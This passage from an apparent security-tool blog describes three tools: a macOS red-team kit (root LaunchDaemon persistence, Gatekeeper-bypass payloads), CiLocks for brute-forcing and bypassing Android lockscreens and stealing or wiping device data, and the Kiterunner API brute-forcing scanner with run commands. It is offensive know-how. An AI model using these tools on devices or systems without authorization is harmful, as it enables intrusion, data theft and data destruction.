To use, paste the contents of "macro.txt" into an Office document, save it as a macro-enabled document or in the 97-2004 document format (e.g. .doc, .xls, etc.), and click "Enable Macros" when opening the document to execute it. </p> </li> <li> <p>Installer Package: I included the TestInstaller.pkg file to test for detections around a basic installer package. This installer package includes a preinstall script which runs in bash and drops com.simple.agent.plist to /Library/LaunchDaemons/ and drops test.js (simple popup prompt) to /Library/Application Support/. The com.simple.agent.plist file simply runs osascript against /Library/Application Support/test.js. It also includes a postinstall script which runs in bash and loads com.simple.agent.plist using launchctl load. While holding the Control key, click Open on TestInstaller.pkg to run it. TestInstaller.pkg will drop the aforementioned files as root.</p> </li> <li> <p>CVE-2021-30657 Bypass Payloads: Two sample payloads (both make curl requests to localhost when detonated) to test two different types of payloads that abuse CVE-2021-30657. 
More info here: <a href="https://cedowens.medium.com/macos-gatekeeper-bypass-2021-edition-5256a2955508" rel="nofollow" target="_blank" title="https://cedowens.medium.com/macos-gatekeeper-bypass-2021-edition-5256a2955508">https://cedowens.medium.com/macos-gatekeeper-bypass-2021-edition-5256a2955508</a></p> </li> </ul> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/cedowens/Swift-Attack" rel="nofollow" target="_blank" title="Download Swift-Attack">Download Swift-Attack</a></span></b></div><br /><br /><span style="font-size: x-large;"><b>CiLocks - Android LockScreen Bypass</b></span><br />Published 2021-05-24<br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-gC11e2udHzY/YKru8f-wuYI/AAAAAAAAWQc/EejT8t57b1Uo-8mjMlBFiPaFOqSgGXpBgCNcBGAsYHQ/s650/CiLocks_1_Screenshot_2021-05-02_14-32-27.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="513" data-original-width="650" height="506" src="https://1.bp.blogspot.com/-gC11e2udHzY/YKru8f-wuYI/AAAAAAAAWQc/EejT8t57b1Uo-8mjMlBFiPaFOqSgGXpBgCNcBGAsYHQ/w640-h506/CiLocks_1_Screenshot_2021-05-02_14-32-27.png" width="640" /></a></div><p><br /></p><br /><span style="font-size: large;"><b>Features</b></span><br /> <ul> <li>Brute Pin 4 Digit</li> <li>Brute Pin 6 Digit</li> <li>Brute LockScreen Using Wordlist</li> <li>Bypass LockScreen {Antiguard} (not supported on all OS versions)</li> <li>Root <a href="https://www.kitploit.com/search/label/Android" target="_blank" title="Android">Android</a> {Supersu} (not supported on all OS versions)</li> <li>Steal File</li> <li>Reset Data</li></ul><div><br /></div><span style="font-size: large;"><b>Required</b></span><br /> <br /> - Adb {Android SDK} <br /> - USB cable <br /> - Android <a 
href="https://www.kitploit.com/search/label/Emulator" target="_blank" title="Emulator">Emulator</a> {NetHunter/Termux} Root <br /> - Or a computer <br /> <br /><span style="font-size: large;"><b> Compatible </b></span><br /> <br /> - Linux <br /> - <a href="https://www.kitploit.com/search/label/Windows" target="_blank" title="Windows">Windows</a> <br /> - Mac <br /> <br /><span style="font-size: large;"><b> Tested On </b></span><br /><br /> - <a href="https://www.kitploit.com/search/label/Kali%20Linux" target="_blank" title="Kali Linux">Kali Linux</a> <br /> <br /><span style="font-size: large;"><b> How To Run </b></span><br /><br /> - git clone <a href="https://github.com/tegal1337/CiLocks" rel="nofollow" target="_blank" title="https://github.com/tegal1337/CiLocks">https://github.com/tegal1337/CiLocks</a> <br /> - cd CiLocks <br /> - chmod +x cilocks <br /> - bash cilocks <br /> <br /> <br /><span style="font-size: x-large;"><b> For Android Emulator </b></span><br /> <br /> - Install Busybox <br /> - Root <br /> <br /><b> If <a href="https://www.kitploit.com/search/label/Brute" target="_blank" title="brute">brute</a> doesn't work then uncomment this line </b><br /><br /> <code># adb shell input keyevent 26</code> <br /> After 5 wrong passwords the device will automatically delay 30 seconds<div> <br /><span style="font-size: large;"><b>Image </b></span><br /><p><br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-1jb1PwOotyw/YKrvCT5hkBI/AAAAAAAAWQg/lsvFZOPolQ8y_HhOKjZILre_iRpd9hpSACNcBGAsYHQ/s650/CiLocks_1_Screenshot_2021-05-02_14-32-27.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="513" data-original-width="650" height="506" src="https://1.bp.blogspot.com/-1jb1PwOotyw/YKrvCT5hkBI/AAAAAAAAWQg/lsvFZOPolQ8y_HhOKjZILre_iRpd9hpSACNcBGAsYHQ/w640-h506/CiLocks_1_Screenshot_2021-05-02_14-32-27.png" width="640" /></a></div><p><br /></p><span style="font-size: large;"><b> 
Video</b></span><br /> <br /> Bypass LockScreen <br /> <a href="https://youtu.be/PPMhzt4lGmU" rel="nofollow" target="_blank" title="https://youtu.be/PPMhzt4lGmU">https://youtu.be/PPMhzt4lGmU</a> <br /> BruteForce Pin <br /> <a href="https://youtu.be/D2xjJUQ9Lsw" rel="nofollow" target="_blank" title="https://youtu.be/D2xjJUQ9Lsw">https://youtu.be/D2xjJUQ9Lsw</a> <br /><span style="font-size: large;"><b>Reference And Media</b></span><br /> <br /> <a href="https://stackoverflow.com/questions/29072501/how-to-unlock-android-phone-through-adb" rel="nofollow" target="_blank" title="https://stackoverflow.com/questions/29072501/how-to-unlock-android-phone-through-adb">https://stackoverflow.com/questions/29072501/how-to-unlock-android-phone-through-adb</a> <br /> <a href="http://www.hak5.org/episodes/hak5-1205" rel="nofollow" target="_blank" title="http://www.hak5.org/episodes/hak5-1205">http://www.hak5.org/episodes/hak5-1205</a> <br /> <a href="https://github.com/kosborn/p2p-adb" rel="nofollow" target="_blank" title="https://github.com/kosborn/p2p-adb">https://github.com/kosborn/p2p-adb</a> <br /> <a href="https://forum.xda-developers.com/t/universal-guide-root-any-android-device-manually.2684210/" rel="nofollow" target="_blank" title="https://forum.xda-developers.com/t/universal-guide-root-any-android-device-manually.2684210/">https://forum.xda-developers.com/t/universal-guide-root-any-android-device-manually.2684210/</a> <br /> <a href="https://stackoverflow.com/questions/14685721/how-can-i-do-factory-reset-using-adb-in-android" rel="nofollow" target="_blank" title="https://stackoverflow.com/questions/14685721/how-can-i-do-factory-reset-using-adb-in-android">https://stackoverflow.com/questions/14685721/how-can-i-do-factory-reset-using-adb-in-android</a> <br /> Contact Me <a href="mailto:mitsuhamizaki@gmail.com" rel="nofollow" target="_blank" title="Email">Email</a> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" 
href="https://github.com/tegal1337/CiLocks" rel="nofollow" target="_blank" title="Download CiLocks">Download CiLocks</a></span></b></div></div><br /><br /><span style="font-size: x-large;"><b>Kiterunner - Contextual Content Discovery Tool</b></span><br />Published 2021-05-08<br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-A-bBRewl_os/YJCbwgSS5uI/AAAAAAAAWGA/ripyTN96MfskSTj9AyUeJD949OAZ0tFHwCNcBGAsYHQ/s640/kiterunner_1_kiterunner.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="241" data-original-width="640" height="240" src="https://1.bp.blogspot.com/-A-bBRewl_os/YJCbwgSS5uI/AAAAAAAAWGA/ripyTN96MfskSTj9AyUeJD949OAZ0tFHwCNcBGAsYHQ/w640-h240/kiterunner_1_kiterunner.png" width="640" /></a></div><p><br /></p> <p>For the longest of times, <a href="https://www.kitploit.com/search/label/Content%20Discovery" target="_blank" title="content discovery">content discovery</a> has been focused on finding files and folders. 
While this approach is effective for legacy web servers that host static files or respond with 3xx’s upon a partial path, it is no longer effective for modern web applications, specifically APIs.</p> <p>Over time, we have seen a lot of time invested in making content discovery tools faster so that larger wordlists can be used, however the art of content discovery has not been innovated upon.</p> <p>Kiterunner is a tool that is capable of not only performing traditional content discovery at lightning fast speeds, but also <a href="https://www.kitploit.com/search/label/Bruteforcing" target="_blank" title="bruteforcing">bruteforcing</a> routes/endpoints in modern applications.</p> <p>Modern application frameworks such as Flask, Rails, Express, Django and others follow the paradigm of explicitly defining routes which expect certain HTTP methods, headers, parameters and values.</p> <p>When using traditional content discovery tooling, such routes are often missed and cannot easily be discovered.</p> <p>By collating a dataset of Swagger specifications and condensing it into our own schema, Kiterunner can use this dataset to bruteforce API endpoints by sending the correct HTTP method, headers, path, parameters and values for each request it sends.</p> <p>Swagger files were collected from a number of datasources, including an internet wide scan for the 40+ most common swagger paths. 
Other datasources included <a href="https://cloud.google.com/bigquery/public-data/github" rel="nofollow" target="_blank" title="GitHub via BigQuery">GitHub via BigQuery</a>, and <a href="https://apis.guru/" rel="nofollow" target="_blank" title="APIs.guru">APIs.guru</a>.</p><div><br /></div><span style="font-size: x-large;"><b>Installation</b></span><br /> <br /><span style="font-size: large;"><b>Downloading a release</b></span><br /> <p>You can download a pre-built copy from <a href="https://github.com/assetnote/kiterunner/releases" rel="nofollow" target="_blank" title="https://github.com/assetnote/kiterunner/releases">https://github.com/assetnote/kiterunner/releases</a>.</p> <br /><span style="font-size: large;"><b>Building from source</b></span><br /> <div><pre><code># build the binary<br />make build<br /><br /># symlink your binary<br />ln -s $(pwd)/dist/kr /usr/local/bin/kr<br /><br /># compile the wordlist<br /># kr kb compile &lt;input.json&gt; &lt;output.kite&gt;<br />kr kb compile routes.json routes.kite<br /><br /># scan away<br />kr scan hosts.txt -w routes.kite -x 20 -j 100 --ignore-length=1053</code></pre></div> <p>The JSON datasets can be found below:</p> <ul> <li><a href="https://wordlists-cdn.assetnote.io/rawdata/kiterunner/routes-large.json.tar.gz" rel="nofollow" target="_blank" title="routes-large.json">routes-large.json</a> (118MB compressed, 2.6GB decompressed)</li> <li><a href="https://wordlists-cdn.assetnote.io/rawdata/kiterunner/routes-small.json.tar.gz" rel="nofollow" target="_blank" title="routes-small.json">routes-small.json</a> (14MB compressed, 228MB decompressed)</li> </ul> <p>Alternatively, it is possible to download the compiled <code>.kite</code> files from the links below:</p> <ul> <li><a href="https://wordlists-cdn.assetnote.io/data/kiterunner/routes-large.kite.tar.gz" rel="nofollow" target="_blank" title="routes-large.kite">routes-large.kite</a> (40MB compressed, 183MB decompressed)</li> <li><a 
href="https://wordlists-cdn.assetnote.io/data/kiterunner/routes-small.kite.tar.gz" rel="nofollow" target="_blank" title="routes-small.kite">routes-small.kite</a> (2MB compressed, 35MB decompressed)</li> </ul> <br /><span style="font-size: x-large;"><b>Usage</b></span><br /> <br /><span style="font-size: large;"><b>Quick Start</b></span><br /> <pre><code>kr [scan|brute] &lt;input&gt; [flags]<br /></code></pre> <ul> <li><code>&lt;input&gt;</code> can be a file, a domain, or a URI; we'll figure it out for you. See <a href="https://github.com/assetnote/kiterunner#inputhost-formatting" rel="nofollow" target="_blank" title="Input/Host Formatting">Input/Host Formatting</a> for more details</li> </ul> <pre><code># Just have a list of hosts and no wordlist<br />kr scan hosts.txt -A=apiroutes-210328:20000 -x 5 -j 100 --fail-status-codes 400,401,404,403,501,502,426,411<br /><br /># You have your own wordlist but you want assetnote wordlists too<br />kr scan target.com -w routes.kite -A=apiroutes-210328:20000 -x 20 -j 1 --fail-status-codes 400,401,404,403,501,502,426,411<br /><br /># <a href="https://www.kitploit.com/search/label/Bruteforce" target="_blank" title="Bruteforce">Bruteforce</a> like normal but with the first 20000 words<br />kr brute https://target.com/subapp/ -A=aspx-210328:20000 -x 20 -j 1<br /><br /># Use a dirsearch style wordlist with %EXT%<br />kr brute https://target.com/subapp/ -w dirsearch.txt -x 20 -j 1 -exml,asp,aspx,ashx -D<br /></code></pre> <br /><span style="font-size: large;"><b>CLI Help</b></span><br /> <pre><code>Usage:<br /> kite scan [flags]<br /><br />Flags:<br /> -A, --assetnote-wordlist strings use the wordlists from wordlist.assetnote.io. specify the type/name to use, e.g. apiroutes-210228. You can specify an additional maxlength to use only the first N values in the wordlist, e.g. apiroutes-210228;20000 will only use the first 20000 lines in that wordlist<br /> --blacklist-domain strings domains that are blacklisted for redirects. 
We will not follow redirects to these domains<br /> --delay duration delay to place inbetween requests to a single host<br /> --disable-precheck whether to skip host discovery<br /> --fail-status-codes ints which status codes blacklist as fail. if this is set, this will override success-status-codes<br /> --filter-api strings only scan apis matching this ksuid<br /> --force-method string whether to ignore the methods specified in the ogl file and force this method <br /> -H, --header strings headers to add to requests (default [x-forwarded-for: 127.0.0.1])<br /> -h, --help help for scan<br /> --ignore-length strings a range of content length bytes to ignore. you can have multiple. e.g. 100-105 or 1234 or 123,34-53. This is inclusive on both ends<br /> --kitebuilder-full-scan perform a full scan without first performing a phase scan.<br /> -w, --kitebuilder-list strings ogl wordlist to use for scanning<br /> -x, --max-connection-per-host int max connections to a single host (default 3)<br /> -j, --max-parallel-hosts int max number of concurrent hosts to scan at once (default 50)<br /> --max-redirects int maximum number of redirects to follow (default 3)<br /> -d, --preflight-depth int when performing preflight checks, what directory depth do we attempt to check. 0 means that only the docroot is checked (default 1)<br /> --profile-name string name for profile output file<br /> --progress a progress bar while scanning. by default enabled only on Stderr (default true)<br /> --quarantine-threshold int if the host return N consecutive hits, we quarantine the host as wildcard. Set to 0 to disable (default 10)<br /> --success-status-codes ints which status codes whitelist as success. this is the default mode<br /> -t, --timeout duration timeout to use on all requests (default 3s)<br /> --user-agent string user agent to use for requests (default "Chrome. 
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36")<br /> --wildcard-detection can be set to false to disable wildcard redirect detection (default true)<br /><br />Global Flags:<br /> --config string config file (default is $HOME/.kiterunner.yaml)<br /> -o, --output string output format. can be json,text,pretty (default "pretty")<br /> -q, --quiet quiet mode. will mute unecessarry pretty text<br /> -v, --verbose string level of logging verbosity. can be error,info,debug,trace (default "info")<br /></code></pre> <p>bruteforce flags (all the flags above +)</p> <pre><code> -D, --dirsearch-compat this will replace %EXT% with the extensions provided. backwards compat with dirsearch because shubs loves him some dirsearch<br /> -e, --extensions strings extensions to append while scanning<br /> -w, --wordlist strings normal wordlist to use for scanning<br /></code></pre> <br /><span style="font-size: large;"><b>Input/Host Formatting</b></span><br /> <p>When supplied with an input, kiterunner will attempt to resolve the input in the following order:</p> <ol> <li>Is the input a file? If so, read all the lines in the file as separate domains</li> <li>Otherwise the input is treated as a "domain"</li> </ol> <p>If you supply a "domain", but it exists as a file, e.g. <code>google.com</code> but <code>google.com</code> is also a txt file in the current directory, we'll load <code>google.com</code> the text file, because we found it first.</p> <p><strong>Domain Parsing</strong></p> <p>It's preferred that you provide a full URI as the input, however you can provide incomplete URIs and we'll try and guess what you mean. 
An example list of domains you can supply is:</p> <pre><code>one.com<br />two.com:80<br />three.com:443<br />four.com:9447<br />https://five.com:9090<br />http://six.com:80/api<br /></code></pre> <p>The above list of domains will expand into the following list of targets:</p> <pre><code>(two targets are created for one.com, since neither port nor protocol was specified)<br />http://one.com (port 80 implied)<br />https://one.com (port 443 implied)<br /><br />http://two.com (port 80 implied)<br />https://three.com (port 443 implied)<br />http://four.com:9447 (non-tls port guessed)<br />https://five.com:9090<br />http://six.com/api (port 80 implied; basepath API appended)<br /></code></pre> <p>The rules we apply are:</p> <ul> <li>If you supply a scheme, we use the scheme. <ul> <li>We only support http &amp; https</li> <li>If you don't supply a scheme, we'll guess based on the port</li> </ul> </li> <li>If you supply a port, we'll use the port <ul> <li>If your port is 443 or 8443, we'll assume it's TLS</li> <li>If you don't supply a port, we'll guess both port 80 and 443</li> </ul> </li> <li>If you supply a path, we'll prepend that path to all requests against that host</li> </ul> <br /><span style="font-size: large;"><b>API Scanning</b></span><br /> <p>When you have a single target</p> <div><pre><code># single target<br />kr scan https://target.com:8443/ -w routes.kite -A=apiroutes-210228:20000 -x 10 --ignore-length=34<br /><br /># single target, but you want to try http and https<br />kr scan target.com -w routes.kite -A=apiroutes-210228:20000 -x 10 --ignore-length=34<br /><br /># a list of targets<br />kr scan targets.txt -w routes.kite -A=apiroutes-210228:20000 -x 10 --ignore-length=34</code></pre></div> <br /><span style="font-size: large;"><b>Vanilla Bruteforcing</b></span><br /> <div><pre><code>kr brute https://target.com -A=raft-large-words -A=apiroutes-210228:20000 -x 10 -d=0 --ignore-length=34 -ejson,txt</code></pre></div> <br /><span style="font-size: 
large;"><b>Dirsearch Bruteforcing</b></span><br /> <p>For when you have an old-school wordlist that still has %EXT% in the wordlist, you can use <code>-D</code>. This will only substitute the extension where %EXT% is present in the path.</p> <div><pre><code>kr brute https://target.com -w dirsearch.txt -x 10 -d=0 --ignore-length=34 -ejson,txt -D</code></pre></div> <br /><span style="font-size: x-large;"><b>Technical Features</b></span><br /> <br /><span style="font-size: large;"><b>Depth Scanning</b></span><br /> <p>A key feature of kiterunner is depth based scanning. This attempts to handle detecting wildcards given virtual application path based routing. The depth defines how many directories deep the baseline checks are performed, e.g.:</p> <div><pre><code>~/kiterunner $ cat wordlist.txt<br /><br />/api/v1/user/create<br />/api/v1/user/delete<br />/api/v2/user/<br />/api/v2/admin/<br />/secrets/v1/<br />/secrets/v2/</code></pre></div> <ul> <li>At depth 0, only <code>/</code> would have the baseline checks performed for wildcard detection</li> <li>At depth 1, <code>/api</code> and <code>/secrets</code> would have baseline checks performed, and these checks would be used against <code>/api</code> and <code>/secrets</code> correspondingly</li> <li>At depth 2, <code>/api/v1</code>, <code>/api/v2</code>, <code>/secrets/v1</code> and <code>/secrets/v2</code> would all have baseline checks performed.</li> </ul> <p>By default, <code>kr scan</code> has a depth of 1, since from internal usage we've often seen this as the most common depth where virtual routing has occurred. <code>kr brute</code> has a default depth of 0, as you typically don't want this check to be performed with a static wordlist.</p> <p>Naturally, increasing the depth will increase the accuracy of your scans, however this also increases the number of requests to the target (<code># of baseline checks * # of depth baseline directories</code>). 
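</p>
<p>The Input/Host Formatting rules and the depth-based baseline selection described above, reimplemented as an added Python example; this is not Kiterunner's own code, and the function names <code>expand_targets</code>, <code>baseline_dirs</code> and <code>baseline_request_count</code> are this example's. It runs the README's own sample hosts and wordlist through both, so the expansion list and the per-depth directory sets can be compared against the tables above. One assumption of the example: a wordlist entry shallower than the requested depth contributes no baseline directory, which the README does not state either way.</p>

```python
"""Kiterunner's documented input/host expansion rules and depth-based baseline
directory selection, reimplemented in Python as an added example.

Not Kiterunner's own code: behaviour follows only the rules stated in the
README (scheme, port and path handling; baseline directories per depth).
IPv6 host literals are not handled.
"""
from typing import List

TLS_PORTS = {443, 8443}          # ports the README says imply TLS


def _format(scheme: str, host: str, port: int, path: str) -> str:
    """Render a target, omitting the port when it is the scheme's default."""
    default = 443 if scheme == "https" else 80
    netloc = host if port == default else f"{host}:{port}"
    return f"{scheme}://{netloc}{path}"


def expand_target(entry: str) -> List[str]:
    """Expand one input line into the concrete target(s) that would be scanned.

    README rules: a supplied scheme wins (http/https only); a supplied port
    wins, with 443/8443 implying https; with neither, both http:80 and
    https:443 are produced; a path is kept as the base path for every request.
    """
    entry = entry.strip()
    scheme = None
    rest = entry
    if "://" in entry:
        scheme, rest = entry.split("://", 1)
        scheme = scheme.lower()
        if scheme not in ("http", "https"):
            raise ValueError(f"unsupported scheme {scheme!r} in {entry!r}")
    hostport, slash, tail = rest.partition("/")
    path = slash + tail if slash else ""
    host, _, port_text = hostport.partition(":")
    if not host:
        raise ValueError(f"no host in {entry!r}")
    port = int(port_text) if port_text else None
    if scheme is None and port is None:
        return [_format("http", host, 80, path), _format("https", host, 443, path)]
    if scheme is None:
        scheme = "https" if port in TLS_PORTS else "http"
    if port is None:
        port = 443 if scheme == "https" else 80
    return [_format(scheme, host, port, path)]


def expand_targets(lines: List[str]) -> List[str]:
    """Expand a whole hosts file, skipping blank lines and '#' comments."""
    out: List[str] = []
    for line in lines:
        if line.strip() and not line.lstrip().startswith("#"):
            out.extend(expand_target(line))
    return out


def baseline_dirs(wordlist: List[str], depth: int) -> List[str]:
    """Directories that receive wildcard baseline checks at the given depth.

    Depth 0 checks only the docroot; depth N takes the first N path segments
    of every wordlist entry.  Entries shallower than N contribute nothing,
    which is this example's assumption, not documented Kiterunner behaviour.
    """
    if depth <= 0:
        return ["/"]
    dirs = set()
    for entry in wordlist:
        segments = [s for s in entry.strip().split("/") if s]
        if len(segments) >= depth:
            dirs.add("/" + "/".join(segments[:depth]))
    return sorted(dirs)


def baseline_request_count(wordlist: List[str], depth: int, checks_per_dir: int) -> int:
    """README cost formula: number of baseline checks x number of baseline directories."""
    return checks_per_dir * len(baseline_dirs(wordlist, depth))


# Constructed inputs: the README's own sample hosts and sample wordlist.
SAMPLE_HOSTS = ["one.com", "two.com:80", "three.com:443", "four.com:9447",
                "https://five.com:9090", "http://six.com:80/api"]
SAMPLE_WORDLIST = ["/api/v1/user/create", "/api/v1/user/delete", "/api/v2/user/",
                   "/api/v2/admin/", "/secrets/v1/", "/secrets/v2/"]

if __name__ == "__main__":
    for target in expand_targets(SAMPLE_HOSTS):
        print(target)
    for depth in range(3):          # checks_per_dir=3 is an assumed figure for illustration
        print(depth, baseline_dirs(SAMPLE_WORDLIST, depth),
              baseline_request_count(SAMPLE_WORDLIST, depth, checks_per_dir=3))
```

<p>The request-count helper makes the trade-off in the paragraph above concrete: on the sample wordlist, depth 1 yields two baseline directories and depth 2 yields four, so every extra level roughly doubles the baseline traffic sent to a host before the real wordlist is even tried.</p>
<p>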
Hence, we recommend against going above depth 1, with depth 2 reserved for rare cases.</p> <br /><span style="font-size: large;"><b>Using Assetnote Wordlists</b></span><br /> <p>We provide inbuilt downloading and caching of wordlists from assetnote.io. You can use these with the <code>-A</code> flag which receives a comma delimited list of aliases, or full names.</p> <p>You can get a full list of all the Assetnote wordlists with <code>kr wordlist list</code>.</p> <p>When used, the wordlists are cached in <code>~/.cache/kiterunner/wordlists</code> and compiled from <code>.txt</code> -> <code>.kite</code></p> <pre><code>+-----------------------------------+-------------------------------------------------------+----------------+---------+----------+--------+<br />| ALIAS | FILENAME | SOURCE | COUNT | FILESIZE | CACHED |<br />+-----------------------------------+-------------------------------------------------------+----------------+---------+----------+--------+<br />| 2m-subdomains | 2m-subdomains.txt | manual.json | 2167059 | 28.0mb | false |<br />| asp_lowercase | asp_lowercase.txt | manual.json | 24074 | 1.1mb | false |<br />| aspx_lowercase | aspx_lowercase.txt | manual.json | 80293 | 4.4mb | false |<br />| bak | bak.txt | manual.json | 31725 | 634.8kb | false |<br />| best-dns-wordlist | best-dns-wordlist.txt | manual.json | 9996122 | 139.0mb | false |<br />| cfm | cfm.txt | manual.json | 12100 | 260.3kb | true |<br />| do | do.txt | manual.json | 173152 | 4.8mb | false |<br />| dot_filenames | dot_filenames.txt | manual.json | 3191712 | 71.3mb | false |<br />| html | html.txt | manual.json | 4227526 | 107.7mb | false |<br />| apiroutes-201120 | httparchive_apiroutes_2020_11_20.txt | automated.json | 953011 | 45.3mb | false |<br />| apiroutes-210128 | httparchive_apiroutes_2021_01_28.txt | automated.json | 225456 | 6.6mb | false |<br />| apiroutes-210228 | httparchive_apiroutes_2021_02_28.txt | automated.json | 223544 | 6.5mb | true |<br />| 
apiroutes-210328 | httparchive_apiroutes_2021_03_28.txt | automated.json | 215114 | 6.3mb | false |<br />| aspx-201118 | httparchive_aspx_asp_cfm_svc_ashx_asmx_2020_11_18.txt | automated.json | 63200 | 1.7mb | false |<br />| aspx-210128 | httparchive_aspx_asp_cfm_svc_ashx_asmx_2021_01_28.txt | automated.json | 46286 | 928.7kb | false |<br />| aspx-210228 | httparchive_aspx_asp_cfm_svc_ashx_asmx_2021_02_28.txt | automated.json | 43958 | 883.3kb | false |<br />| aspx-210328 | httparchive_aspx_asp_cfm_svc_ashx_asmx_2021_03_28.txt | automated.json | 45928 | 926.8kb | false |<br />| cgi-201118 | httparchive_cgi_pl_2020_11_18.txt | automated.json | 2637 | 44.0kb | false |<br /><br />&lt;SNIP&gt;<br /></code></pre> <p><strong>Usage</strong></p> <pre><code>kr scan targets.txt -A=apiroutes-210228 -x 10 --ignore-length=34<br />kr brute targets.txt -A=aspx-210228 -x 10 --ignore-length=34 -easp,aspx<br /></code></pre> <br /><b>Head Syntax</b><br /> <p>When using assetnote provided wordlists, you may not want to use the entire wordlist, so you can opt to use the first N lines in a given wordlist using the <code>head syntax</code>. The format is <code>&lt;wordlist_name&gt;:&lt;N lines&gt;</code> when specifying a wordlist.</p> <p><strong>Usage</strong></p> <pre><code># this will use the first 20000 lines in the api routes wordlist<br />kr scan targets.txt -A=apiroutes-210228:20000 -x 10 --ignore-length=34<br /><br /># this will use the first 10 lines in the aspx wordlist<br />kr brute targets.txt -A=aspx-210228:10 -x 10 --ignore-length=34 -easp,aspx<br /></code></pre> <br /><span style="font-size: large;"><b>Concurrency Settings/Going Fast</b></span><br /> <p>Kiterunner is made to go fast on a lot of hosts. But, just because you can run kiterunner at 20000 goroutines, doesn't mean it's a good idea. 
Bottlenecks and <a href="https://www.kitploit.com/search/label/Performance" target="_blank" title="performance">performance</a> degradation will occur at high thread counts due to more time spent scheduling goroutines that are waiting on network IO and kernel context switching.</p> <p>There are two main concurrency settings for kiterunner:</p> <ul> <li><code>-x, --max-connection-per-host</code> - maximum number of open connections we can have on a host. Governed by 1 goroutine each. To avoid DoS'ing a host, we recommend keeping this in a low realm of 5-10. Depending on latency to the target, this will yield on average between 1-5 requests per second per connection (200ms - 1000ms/req) to a host.</li> <li><code>-j, --max-parallel-hosts</code> - maximum number of hosts to scan at any given time. Governed by 1 supervisor goroutine for each.</li> </ul> <p>Depending on the hardware you are scanning from, the "maximum" number of goroutines you can run optimally will vary. On an AWS t3.medium, we saw performance degradation going over 2500 goroutines, meaning 500 hosts x 5 connections per host (2500) would yield peak performance.</p> <p>We recommend <strong>against</strong> running kiterunner from your <strong>MacBook</strong>. Due to poor kernel optimisations for high IO counts and Epoll syscalls on macOS, we noticed substantially poorer (0.3-0.5x) performance when compared to running kiterunner on a similarly configured Linux instance.</p> <p>To maximise performance when scanning an individual target, or a large attack surface, we recommend the following tips:</p> <ul> <li>Spin up an EC2 instance in a similar geographic region/datacenter to the target(s) you are scanning</li> <li>Perform some initial benchmarks against your target set with varying <code>-x</code> and <code>-j</code> options. 
A typical starting point is around <code>-x 5 -j 100</code>, moving <code>-j</code> upwards as your CPU usage/network performance permits</li> </ul> <br /><span style="font-size: large;"><b>Converting between file formats</b></span><br /> <p>Kiterunner will also let you convert between the schema JSON, a kite file and a standard txt wordlist.</p> <p><strong>Usage</strong></p> <p>The format is decided by the filetype extension supplied in the <code>&lt;input&gt;</code> and <code>&lt;output&gt;</code> fields. We support <code>txt</code>, <code>json</code> and <code>kite</code>.</p> <div><pre><code>kr kb convert wordlist.txt wordlist.kite<br />kr kb convert wordlist.kite wordlist.json<br />kr kb convert wordlist.kite wordlist.txt</code></pre></div> <pre><code>❯ go run ./cmd/kiterunner kb convert -qh<br />convert an input file format into the specified output file format<br /><br />this will determine the conversion based on the extensions of the input and the output<br />we support the following filetypes: txt, json, kite<br />You can convert any of the following into the corresponding types<br /><br />-d Debug mode will attempt to convert the schema with error handling<br />-v=debug Debug verbosity will print out the errors for the schema<br /><br />Usage:<br />kite kb convert &lt;input&gt; &lt;output&gt; [flags]<br /><br />Flags:<br />-d, --debug debug the parsing<br />-h, --help help for convert<br /><br />Global Flags:<br />--config string config file (default is $HOME/.kiterunner.yaml)<br />-o, --output string output format. can be json,text,pretty (default "pretty")<br />-q, --quiet quiet mode. will mute unecessarry pretty text<br />-v, --verbose string level of logging verbosity. 
can be error,info,debug,trace ( default "info")<br /></code></pre> <br /><span style="font-size: large;"><b>Replaying requests</b></span><br /> <p>When you receive a bunch of output from kiterunner, it may be difficult to immediately understand why a request is causing a specific response code/length. Kiterunner offers a method of rebuilding the request from the wordlists used, including all the header and body parameters.</p> <ul> <li>You can replay a request by copy-pasting the full response output into the <code>kb replay</code> command.</li> <li>You can specify a <code>--proxy</code> to forward your requests through, so you can modify/repeat/intercept the request using 3rd party tools if you wish</li> <li>The Go net/http client will unfortunately make a few additional changes to your request, due to how the default Go implementation behaves.</li> </ul> <div><pre><code>❯ go run ./cmd/kiterunner kb replay -q --proxy=http://localhost:8080 -w routes.kite "POST 403 [ 287, 10, 1] https://target.com/dedalo/lib/dedalo/publication/server_api/v1/json/thesaurus_parents 0cc39f76702ea287ec3e93f4b4710db9c8a86251"<br />11:25AM INF Raw reconstructed request<br />POST /dedalo/lib/dedalo/publication/server_api/v1/json/thesaurus_parents?ar_fields=48637466&code=66132381&db_name=08791392&lang=lg-eng&recursive=false&term_id=72336471 HTTP/1.1<br />Content-Type: any<br /><br /><br />11:25AM INF Outbound request<br />POST /dedalo/lib/dedalo/publication/server_api/v1/json/thesaurus_parents?ar_fields=48637466&code=66132381&db_name=08791392&lang=lg-eng&recursive=false&term_id=72336471 HTTP/1.1<br />Host: target.com<br />User-Agent: Go-http-client/1.1<br />Content-Length: 0<br />Content-Type: any<br />Accept-Encoding: gzip<br /><br /><br />11:25AM INF Response After Redirects<br />HTTP/1.1 403 Forbidden<br />Connection: close<br />Content-Length: 45<br />Content-Type: application/json<br />Date: Wed, 07 Apr 2021 01:25:28 GMT<br />X-Amzn-Requestid: 
